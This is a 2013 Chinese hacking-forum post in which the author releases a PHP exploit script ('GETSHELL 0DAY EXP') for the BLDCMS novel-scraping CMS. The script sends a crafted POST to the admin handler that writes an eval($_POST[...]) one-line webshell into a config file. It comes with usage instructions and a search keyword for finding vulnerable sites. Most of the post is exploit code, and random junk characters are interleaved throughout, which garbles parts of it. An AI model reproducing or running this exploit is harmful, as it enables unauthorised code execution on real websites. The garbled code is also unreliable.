之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞& c) M' [. E6 M& e
+ t$ a* z' m) J- s9 z4 |
) i( M1 C6 {1 Y" m话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
( @8 ^: T5 c/ h J! A+ K2 w; p. l* a5 D 2 j. y' n4 {- Y% ~
既然都有人发了 我就把我之前写好的EXP放出来吧) L% j: E+ m* K, L* T( L* C
" b' U2 @5 h, o) @% D
view source print?01.php;">1 O( O2 G) Z) h/ p) U
02.<!--?php
6 Y: u! _& t" l" |! V9 B3 K8 e03.echo "-------------------------------------------------------------------
8 ^* n( p- ^7 ?. j R- S04.
9 @/ T/ R/ t5 d! Z9 W05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP. E7 I& m" L0 O2 w2 V& I( W
06. 7 L4 N* o# A9 B1 x
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
: x2 |. \2 A- B, D08.
8 D; j$ Y, F0 Z' K, O: U& x09.QQ:981009941\r\n 2013.3.21\r\n 9 z$ v1 X5 u' R9 I
10. ( X. y7 u1 h ?: V$ h* E9 l* V
11.
$ v; S3 x$ P0 ^% U12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码8 r l! S7 K( A6 m. [ j- A9 U+ O
13. 7 u4 p/ F, W. B6 M% ?( d: p3 ^- \
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------. N' l% y) T- R; C3 |
15.
$ f- N& l$ [) M16.--------------------------------------------------------------------\r\n";0 f4 O" R2 W l8 ]
17.$url=$argv[1];
% t [: I, h E6 b/ A18.$dir=$argv[2];
/ t; z9 F( R# B& a19.$pass=$argv[3];
% q6 D( q. c5 c! g- _+ L20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';5 D/ k& T5 S; Y5 H# s
21.if (emptyempty($pass)||emptyempty($url))
& X& O! w ]2 { k9 F22.{exit("请输入参数");}! K8 _6 `2 D5 D3 K. c5 _- z
23.else
8 \8 C! f2 o. ~3 Q; U24.{
" U+ W+ `( ?) p0 p3 L' P) t25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev, n; ?" x) `) d& Z! ], s9 A" a0 V
26. ( D# F% w) F: j0 O( D( n8 X
27.al;
, X) ~9 Y N# }4 v. d2 z# z; O28.$length = strlen($fuckdata);
! F" {- A- R! [5 Y! c29.function getshell($url,$pass)) E! y1 B4 Q$ X9 K
30.{: Z+ m ^' G5 ~9 s* j. Z# N! q4 T
31.global $url,$dir,$pass,$eval,$length,$fuckdata;& Q/ k# I! b2 u' a
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";) L+ b" d" `1 ~! G- M) \4 H
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, b/ e i+ y' [8 T" g3 l34.$header .= "User-Agent: MSIE\r\n";& S& f! J7 |7 M8 S; M% F: G
35.$header .= "Host:".$url."\r\n";$ R7 F0 t, `8 t: K
36.$header .= "Content-Length: ".$length."\r\n";
$ p# B5 A) `& p37.$header .= "Connection: Close\r\n";
& b6 Z% z; Q: ]+ N38.$header .="\r\n";9 W7 C& H6 _) L, G* k* y5 y, B
39.$header .= $fuckdata."\r\n\r\n";- G$ p# u# Z4 D9 f6 C) Q5 H
40.$fp = fsockopen($url, 80,$errno,$errstr,15);" q$ C9 { s! f# P3 C5 L, c
41.if (!$fp)
4 `& ]7 b* g9 j1 s% u42.{
3 L! D2 f- [2 K* D4 C43.exit ("利用失败:请检查指定目标是否能正常打开");
7 u$ b5 \* `4 @. [# M9 | ]7 t8 J44.}
. a8 B0 v/ |% R' V+ O45.else{ if (!fputs($fp,$header))
6 G$ g8 P/ g, n x1 ]% w46.{exit ("利用失败");}
( a0 y/ j! p$ O7 Q9 X# F' w: _47.else0 J# K- A1 k/ C/ s9 e3 n$ K
48.{
- z' U* P3 C ~7 o' ?* o49.$receive = '';
5 \, {7 g5 q8 x m% l# l( Q50.while (!feof($fp)) {$ y# S9 l" p7 ^; C: ]
51.$receive .= @fgets($fp, 1000);5 N4 ^& m% U: D5 J
52.}
1 R2 R/ G' @$ k* v9 i1 u* a2 N53.@fclose($fp);
$ y6 L: x1 t9 E( U7 K6 [3 t1 y54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
' c6 q7 S9 E0 P* H( _/ F8 F55. " e; B+ d1 ]8 W% {3 M2 |/ o6 d }! T
56.GPC是否=off)";
( ~. g1 J6 @+ Z1 S57.}}
% B9 S# A* _( S, c58.}" N1 e1 T% b' m' G8 i
59.}& U* O/ _, ] n P5 }' j
60.getshell($url,$pass);" E1 E. t( n- z2 ]. ?
61.?-->2 x. W( p& B6 k' {% m
* m- W$ r9 q7 W6 Y% t) @( z- Z
/ }" D0 t( R. M# ?- V3 F
1 I% {3 B, G9 R* Uby 数据流
2 G6 U( n$ [8 ^ |
发表于 2013-3-26 20:49:10
收藏
支持
反对